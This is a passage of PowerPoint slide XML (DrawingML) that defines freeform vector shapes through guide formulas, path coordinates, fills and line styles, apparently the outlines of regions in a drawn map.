                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36457" name="Freeform 189"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2888" y="2387"/>
                <a:ext cx="249" cy="242"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 247 w 249"/>
                  <a:gd name="T1" fmla="*/ 209 h 242"/>
                  <a:gd name="T2" fmla="*/ 246 w 249"/>
                  <a:gd name="T3" fmla="*/ 234 h 242"/>
                  <a:gd name="T4" fmla="*/ 232 w 249"/>
                  <a:gd name="T5" fmla="*/ 234 h 242"/>
                  <a:gd name="T6" fmla="*/ 217 w 249"/>
                  <a:gd name="T7" fmla="*/ 235 h 242"/>
                  <a:gd name="T8" fmla="*/ 142 w 249"/>
                  <a:gd name="T9" fmla="*/ 195 h 242"/>
                  <a:gd name="T10" fmla="*/ 102 w 249"/>
                  <a:gd name="T11" fmla="*/ 176 h 242"/>
                  <a:gd name="T12" fmla="*/ 78 w 249"/>
                  <a:gd name="T13" fmla="*/ 188 h 242"/>
                  <a:gd name="T14" fmla="*/ 68 w 249"/>
                  <a:gd name="T15" fmla="*/ 182 h 242"/>
                  <a:gd name="T16" fmla="*/ 59 w 249"/>
                  <a:gd name="T17" fmla="*/ 179 h 242"/>
                  <a:gd name="T18" fmla="*/ 41 w 249"/>
                  <a:gd name="T19" fmla="*/ 174 h 242"/>
                  <a:gd name="T20" fmla="*/ 34 w 249"/>
                  <a:gd name="T21" fmla="*/ 162 h 242"/>
                  <a:gd name="T22" fmla="*/ 26 w 249"/>
                  <a:gd name="T23" fmla="*/ 158 h 242"/>
                  <a:gd name="T24" fmla="*/ 16 w 249"/>
                  <a:gd name="T25" fmla="*/ 158 h 242"/>
                  <a:gd name="T26" fmla="*/ 11 w 249"/>
                  <a:gd name="T27" fmla="*/ 150 h 242"/>
                  <a:gd name="T28" fmla="*/ 0 w 249"/>
                  <a:gd name="T29" fmla="*/ 129 h 242"/>
                  <a:gd name="T30" fmla="*/ 3 w 249"/>
                  <a:gd name="T31" fmla="*/ 126 h 242"/>
                  <a:gd name="T32" fmla="*/ 8 w 249"/>
                  <a:gd name="T33" fmla="*/ 121 h 242"/>
                  <a:gd name="T34" fmla="*/ 5 w 249"/>
                  <a:gd name="T35" fmla="*/ 106 h 242"/>
                  <a:gd name="T36" fmla="*/ 7 w 249"/>
                  <a:gd name="T37" fmla="*/ 97 h 242"/>
                  <a:gd name="T38" fmla="*/ 7 w 249"/>
                  <a:gd name="T39" fmla="*/ 84 h 242"/>
                  <a:gd name="T40" fmla="*/ 6 w 249"/>
                  <a:gd name="T41" fmla="*/ 72 h 242"/>
                  <a:gd name="T42" fmla="*/ 1 w 249"/>
                  <a:gd name="T43" fmla="*/ 56 h 242"/>
                  <a:gd name="T44" fmla="*/ 4 w 249"/>
                  <a:gd name="T45" fmla="*/ 53 h 242"/>
                  <a:gd name="T46" fmla="*/ 12 w 249"/>
                  <a:gd name="T47" fmla="*/ 46 h 242"/>
                  <a:gd name="T48" fmla="*/ 11 w 249"/>
                  <a:gd name="T49" fmla="*/ 34 h 242"/>
                  <a:gd name="T50" fmla="*/ 22 w 249"/>
                  <a:gd name="T51" fmla="*/ 21 h 242"/>
                  <a:gd name="T52" fmla="*/ 32 w 249"/>
                  <a:gd name="T53" fmla="*/ 15 h 242"/>
                  <a:gd name="T54" fmla="*/ 33 w 249"/>
                  <a:gd name="T55" fmla="*/ 8 h 242"/>
                  <a:gd name="T56" fmla="*/ 43 w 249"/>
                  <a:gd name="T57" fmla="*/ 5 h 242"/>
                  <a:gd name="T58" fmla="*/ 54 w 249"/>
                  <a:gd name="T59" fmla="*/ 7 h 242"/>
                  <a:gd name="T60" fmla="*/ 65 w 249"/>
                  <a:gd name="T61" fmla="*/ 7 h 242"/>
                  <a:gd name="T62" fmla="*/ 80 w 249"/>
                  <a:gd name="T63" fmla="*/ 12 h 242"/>
                  <a:gd name="T64" fmla="*/ 89 w 249"/>
                  <a:gd name="T65" fmla="*/ 14 h 242"/>
                  <a:gd name="T66" fmla="*/ 93 w 249"/>
                  <a:gd name="T67" fmla="*/ 18 h 242"/>
                  <a:gd name="T68" fmla="*/ 98 w 249"/>
                  <a:gd name="T69" fmla="*/ 30 h 242"/>
                  <a:gd name="T70" fmla="*/ 105 w 249"/>
                  <a:gd name="T71" fmla="*/ 36 h 242"/>
                  <a:gd name="T72" fmla="*/ 117 w 249"/>
                  <a:gd name="T73" fmla="*/ 37 h 242"/>
                  <a:gd name="T74" fmla="*/ 127 w 249"/>
                  <a:gd name="T75" fmla="*/ 40 h 242"/>
                  <a:gd name="T76" fmla="*/ 136 w 249"/>
                  <a:gd name="T77" fmla="*/ 44 h 242"/>
                  <a:gd name="T78" fmla="*/ 151 w 249"/>
                  <a:gd name="T79" fmla="*/ 54 h 242"/>
                  <a:gd name="T80" fmla="*/ 158 w 249"/>
                  <a:gd name="T81" fmla="*/ 53 h 242"/>
                  <a:gd name="T82" fmla="*/ 168 w 249"/>
                  <a:gd name="T83" fmla="*/ 45 h 242"/>
                  <a:gd name="T84" fmla="*/ 170 w 249"/>
                  <a:gd name="T85" fmla="*/ 38 h 242"/>
                  <a:gd name="T86" fmla="*/ 167 w 249"/>
                  <a:gd name="T87" fmla="*/ 28 h 242"/>
                  <a:gd name="T88" fmla="*/ 169 w 249"/>
                  <a:gd name="T89" fmla="*/ 20 h 242"/>
                  <a:gd name="T90" fmla="*/ 176 w 249"/>
                  <a:gd name="T91" fmla="*/ 14 h 242"/>
                  <a:gd name="T92" fmla="*/ 185 w 249"/>
                  <a:gd name="T93" fmla="*/ 9 h 242"/>
                  <a:gd name="T94" fmla="*/ 204 w 249"/>
                  <a:gd name="T95" fmla="*/ 6 h 242"/>
                  <a:gd name="T96" fmla="*/ 215 w 249"/>
                  <a:gd name="T97" fmla="*/ 11 h 242"/>
                  <a:gd name="T98" fmla="*/ 217 w 249"/>
                  <a:gd name="T99" fmla="*/ 16 h 242"/>
                  <a:gd name="T100" fmla="*/ 221 w 249"/>
                  <a:gd name="T101" fmla="*/ 19 h 242"/>
                  <a:gd name="T102" fmla="*/ 232 w 249"/>
                  <a:gd name="T103" fmla="*/ 22 h 242"/>
                  <a:gd name="T104" fmla="*/ 245 w 249"/>
                  <a:gd name="T105" fmla="*/ 23 h 242"/>
                  <a:gd name="T106" fmla="*/ 247 w 249"/>
                  <a:gd name="T107" fmla="*/ 28 h 242"/>
                  <a:gd name="T108" fmla="*/ 249 w 249"/>
                  <a:gd name="T109" fmla="*/ 32 h 242"/>
                  <a:gd name="T110" fmla="*/ 245 w 249"/>
                  <a:gd name="T111" fmla="*/ 37 h 242"/>
                  <a:gd name="T112" fmla="*/ 246 w 249"/>
                  <a:gd name="T113" fmla="*/ 51 h 242"/>
                  <a:gd name="T114" fmla="*/ 243 w 249"/>
                  <a:gd name="T115" fmla="*/ 58 h 242"/>
                  <a:gd name="T116" fmla="*/ 247 w 249"/>
                  <a:gd name="T117" fmla="*/ 73 h 242"/>
                  <a:gd name="T118" fmla="*/ 247 w 249"/>
                  <a:gd name="T119" fmla="*/ 84 h 242"/>
                  <a:gd name="T120" fmla="*/ 247 w 249"/>
                  <a:gd name="T121" fmla="*/ 127 h 242"/>
                  <a:gd name="T122" fmla="*/ 247 w 249"/>
                  <a:gd name="T123" fmla="*/ 149 h 242"/>
                  <a:gd name="T124" fmla="*/ 247 w 249"/>
                  <a:gd name="T125" fmla="*/ 181 h 24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249"/>
                  <a:gd name="T190" fmla="*/ 0 h 242"/>
                  <a:gd name="T191" fmla="*/ 249 w 249"/>
                  <a:gd name="T192" fmla="*/ 242 h 24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249" h="242">
                    <a:moveTo>
                      <a:pt x="247" y="201"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="247" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="201"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36458" name="Freeform 190"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3058" y="2217"/>
                <a:ext cx="104" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 67 w 104"/>
                  <a:gd name="T1" fmla="*/ 130 h 135"/>
                  <a:gd name="T2" fmla="*/ 54 w 104"/>
                  <a:gd name="T3" fmla="*/ 129 h 135"/>
                  <a:gd name="T4" fmla="*/ 57 w 104"/>
                  <a:gd name="T5" fmla="*/ 122 h 135"/>
                  <a:gd name="T6" fmla="*/ 58 w 104"/>
                  <a:gd name="T7" fmla="*/ 123 h 135"/>
                  <a:gd name="T8" fmla="*/ 62 w 104"/>
                  <a:gd name="T9" fmla="*/ 123 h 135"/>
                  <a:gd name="T10" fmla="*/ 63 w 104"/>
                  <a:gd name="T11" fmla="*/ 124 h 135"/>
                  <a:gd name="T12" fmla="*/ 65 w 104"/>
                  <a:gd name="T13" fmla="*/ 125 h 135"/>
                  <a:gd name="T14" fmla="*/ 78 w 104"/>
                  <a:gd name="T15" fmla="*/ 126 h 135"/>
                  <a:gd name="T16" fmla="*/ 86 w 104"/>
                  <a:gd name="T17" fmla="*/ 128 h 135"/>
                  <a:gd name="T18" fmla="*/ 90 w 104"/>
                  <a:gd name="T19" fmla="*/ 132 h 135"/>
                  <a:gd name="T20" fmla="*/ 95 w 104"/>
                  <a:gd name="T21" fmla="*/ 130 h 135"/>
                  <a:gd name="T22" fmla="*/ 97 w 104"/>
                  <a:gd name="T23" fmla="*/ 131 h 135"/>
                  <a:gd name="T24" fmla="*/ 87 w 104"/>
                  <a:gd name="T25" fmla="*/ 134 h 135"/>
                  <a:gd name="T26" fmla="*/ 8 w 104"/>
                  <a:gd name="T27" fmla="*/ 31 h 135"/>
                  <a:gd name="T28" fmla="*/ 21 w 104"/>
                  <a:gd name="T29" fmla="*/ 18 h 135"/>
                  <a:gd name="T30" fmla="*/ 33 w 104"/>
                  <a:gd name="T31" fmla="*/ 12 h 135"/>
                  <a:gd name="T32" fmla="*/ 45 w 104"/>
                  <a:gd name="T33" fmla="*/ 8 h 135"/>
                  <a:gd name="T34" fmla="*/ 79 w 104"/>
                  <a:gd name="T35" fmla="*/ 8 h 135"/>
                  <a:gd name="T36" fmla="*/ 95 w 104"/>
                  <a:gd name="T37" fmla="*/ 5 h 135"/>
                  <a:gd name="T38" fmla="*/ 100 w 104"/>
                  <a:gd name="T39" fmla="*/ 0 h 135"/>
                  <a:gd name="T40" fmla="*/ 96 w 104"/>
                  <a:gd name="T41" fmla="*/ 15 h 135"/>
                  <a:gd name="T42" fmla="*/ 83 w 104"/>
                  <a:gd name="T43" fmla="*/ 16 h 135"/>
                  <a:gd name="T44" fmla="*/ 73 w 104"/>
                  <a:gd name="T45" fmla="*/ 16 h 135"/>
                  <a:gd name="T46" fmla="*/ 65 w 104"/>
                  <a:gd name="T47" fmla="*/ 17 h 135"/>
                  <a:gd name="T48" fmla="*/ 56 w 104"/>
                  <a:gd name="T49" fmla="*/ 18 h 135"/>
                  <a:gd name="T50" fmla="*/ 61 w 104"/>
                  <a:gd name="T51" fmla="*/ 25 h 135"/>
                  <a:gd name="T52" fmla="*/ 63 w 104"/>
                  <a:gd name="T53" fmla="*/ 28 h 135"/>
                  <a:gd name="T54" fmla="*/ 56 w 104"/>
                  <a:gd name="T55" fmla="*/ 27 h 135"/>
                  <a:gd name="T56" fmla="*/ 60 w 104"/>
                  <a:gd name="T57" fmla="*/ 31 h 135"/>
                  <a:gd name="T58" fmla="*/ 56 w 104"/>
                  <a:gd name="T59" fmla="*/ 30 h 135"/>
                  <a:gd name="T60" fmla="*/ 51 w 104"/>
                  <a:gd name="T61" fmla="*/ 29 h 135"/>
                  <a:gd name="T62" fmla="*/ 53 w 104"/>
                  <a:gd name="T63" fmla="*/ 33 h 135"/>
                  <a:gd name="T64" fmla="*/ 56 w 104"/>
                  <a:gd name="T65" fmla="*/ 36 h 135"/>
                  <a:gd name="T66" fmla="*/ 50 w 104"/>
                  <a:gd name="T67" fmla="*/ 31 h 135"/>
                  <a:gd name="T68" fmla="*/ 44 w 104"/>
                  <a:gd name="T69" fmla="*/ 23 h 135"/>
                  <a:gd name="T70" fmla="*/ 41 w 104"/>
                  <a:gd name="T71" fmla="*/ 22 h 135"/>
                  <a:gd name="T72" fmla="*/ 38 w 104"/>
                  <a:gd name="T73" fmla="*/ 32 h 135"/>
                  <a:gd name="T74" fmla="*/ 42 w 104"/>
                  <a:gd name="T75" fmla="*/ 38 h 135"/>
                  <a:gd name="T76" fmla="*/ 49 w 104"/>
                  <a:gd name="T77" fmla="*/ 52 h 135"/>
                  <a:gd name="T78" fmla="*/ 46 w 104"/>
                  <a:gd name="T79" fmla="*/ 48 h 135"/>
                  <a:gd name="T80" fmla="*/ 42 w 104"/>
                  <a:gd name="T81" fmla="*/ 51 h 135"/>
                  <a:gd name="T82" fmla="*/ 38 w 104"/>
                  <a:gd name="T83" fmla="*/ 57 h 135"/>
                  <a:gd name="T84" fmla="*/ 46 w 104"/>
                  <a:gd name="T85" fmla="*/ 62 h 135"/>
                  <a:gd name="T86" fmla="*/ 52 w 104"/>
                  <a:gd name="T87" fmla="*/ 65 h 135"/>
                  <a:gd name="T88" fmla="*/ 59 w 104"/>
                  <a:gd name="T89" fmla="*/ 68 h 135"/>
                  <a:gd name="T90" fmla="*/ 62 w 104"/>
                  <a:gd name="T91" fmla="*/ 80 h 135"/>
                  <a:gd name="T92" fmla="*/ 56 w 104"/>
                  <a:gd name="T93" fmla="*/ 77 h 135"/>
                  <a:gd name="T94" fmla="*/ 49 w 104"/>
                  <a:gd name="T95" fmla="*/ 75 h 135"/>
                  <a:gd name="T96" fmla="*/ 47 w 104"/>
                  <a:gd name="T97" fmla="*/ 80 h 135"/>
                  <a:gd name="T98" fmla="*/ 51 w 104"/>
                  <a:gd name="T99" fmla="*/ 82 h 135"/>
                  <a:gd name="T100" fmla="*/ 49 w 104"/>
                  <a:gd name="T101" fmla="*/ 88 h 135"/>
                  <a:gd name="T102" fmla="*/ 45 w 104"/>
                  <a:gd name="T103" fmla="*/ 85 h 135"/>
                  <a:gd name="T104" fmla="*/ 42 w 104"/>
                  <a:gd name="T105" fmla="*/ 89 h 135"/>
                  <a:gd name="T106" fmla="*/ 46 w 104"/>
                  <a:gd name="T107" fmla="*/ 103 h 135"/>
                  <a:gd name="T108" fmla="*/ 33 w 104"/>
                  <a:gd name="T109" fmla="*/ 98 h 135"/>
                  <a:gd name="T110" fmla="*/ 23 w 104"/>
                  <a:gd name="T111" fmla="*/ 93 h 135"/>
                  <a:gd name="T112" fmla="*/ 19 w 104"/>
                  <a:gd name="T113" fmla="*/ 81 h 135"/>
                  <a:gd name="T114" fmla="*/ 26 w 104"/>
                  <a:gd name="T115" fmla="*/ 72 h 135"/>
                  <a:gd name="T116" fmla="*/ 45 w 104"/>
                  <a:gd name="T117" fmla="*/ 75 h 135"/>
                  <a:gd name="T118" fmla="*/ 36 w 104"/>
                  <a:gd name="T119" fmla="*/ 66 h 135"/>
                  <a:gd name="T120" fmla="*/ 17 w 104"/>
                  <a:gd name="T121" fmla="*/ 68 h 135"/>
                  <a:gd name="T122" fmla="*/ 16 w 104"/>
                  <a:gd name="T123" fmla="*/ 56 h 135"/>
                  <a:gd name="T124" fmla="*/ 9 w 104"/>
                  <a:gd name="T125" fmla="*/ 53 h 135"/>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04"/>
                  <a:gd name="T190" fmla="*/ 0 h 135"/>
                  <a:gd name="T191" fmla="*/ 104 w 104"/>
                  <a:gd name="T192" fmla="*/ 135 h 135"/>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04" h="135">
                    <a:moveTo>
                      <a:pt x="73" y="135"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="73" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="132"/>
